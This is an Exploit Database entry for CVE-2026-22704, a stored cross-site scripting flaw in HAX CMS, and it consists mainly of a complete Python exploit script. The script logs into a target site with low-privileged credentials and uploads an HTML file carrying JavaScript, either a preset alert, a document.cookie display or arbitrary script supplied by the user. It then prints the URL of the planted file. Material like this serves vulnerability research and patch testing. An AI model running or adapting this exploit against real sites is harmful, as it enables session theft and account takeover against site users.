This website uses cookies We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services. You consent to our cookies if you continue to use our website. Show details Allow all cookies Use necessary cookies only EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING HAX CMS 24.x - Stored Cross-Site Scripting (XSS) EDB-ID: 52526 CVE: 2026-22704 EDB Verified: Author: BANYAMER Type: WEBAPPS Exploit: / Platform: MULTIPLE Date: 2026-04-29 Vulnerable App: # Exploit Title: HAX CMS 24.x - Stored Cross-Site Scripting (XSS) # Date: 2026-01-28 # Google Dork: "N/A" # Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Vendor Homepage: https://www.drupal.org/project/hax # Software Link: https://github.com/elmsln/haxcms # Version: <= 24.x (tested) # Tested on: Linux # CVE: CVE-2026-22704 # # Description: # HAX CMS allows low-privileged authenticated users to upload HTML files # without proper content sanitization. Uploaded HTML files are rendered # directly by the application, leading to a Stored Cross-Site Scripting (XSS) # vulnerability when accessed by other users. # # # Usage: # python3 haxcms_stored_xss.py --target http://TARGET --user USER --password PASS # import argparse import requests from urllib.parse import urljoin def create_poc_html(payload_type="alert"): """ Generate HTML PoC file. Payload types: - alert : simple JS alert (default) - cookie : cookie access demonstration - custom : user supplied JavaScript """ if payload_type == "cookie": js_payload = """ alert("PoC: document.cookie = " + document.cookie); """ elif payload_type == "alert": js_payload = """ alert("Stored XSS PoC - CVE-2026-22704"); """ else: js_payload = payload_type return f"""<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>PoC</title> </head> <body> <h2>HAX CMS Stored XSS PoC</h2> <script> {js_payload.strip()} </script> </body> </html> """ def upload_file(target, username, password, filename, content): session = requests.Session() login_url = urljoin(target, "/user/login") login_data = { "name": username, "pass": password, "form_id": "user_login_form", "op": "Log in" } print("[*] Logging in...") r = session.post(login_url, data=login_data, allow_redirects=True) if "log out" not in r.text.lower(): print("[!] Login failed") return False print("[+] Login successful") upload_url = urljoin(target, "/files/upload") files = { "files[upload]": (filename, content.encode(), "text/html") } print("[*] Uploading HTML file...") r = session.post(upload_url, files=files) if r.status_code not in (200, 201, 302): print("[!] Upload failed") return False file_url = urljoin(target, f"/sites/default/files/{filename}") print("[+] File uploaded successfully") print("[+] PoC URL:") print(file_url) return True def main(): parser = argparse.ArgumentParser(description="HAX CMS Stored XSS PoC (CVE-2026-22704)") parser.add_argument("--target", required=True, help="Target base URL") parser.add_argument("--user", required=True, help="Low privilege username") parser.add_argument("--password", required=True, help="Password") parser.add_argument("--payload", default="alert", choices=["alert", "cookie", "custom"], help="PoC payload type") parser.add_argument("--filename", default="poc.html", help="Uploaded file name") args = parser.parse_args() if args.payload == "custom": js = input("[?] Enter custom JavaScript payload:\n> ") html = create_poc_html(js) else: html = create_poc_html(args.payload) upload_file( args.target.rstrip("/"), args.user, args.password, args.filename, html ) if __name__ == "__main__": main() Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services EXPLOIT DATABASE BY OFFSEC TERMS PRIVACY ABOUT US FAQ COOKIES © OffSec Services Limited 2026. All rights reserved.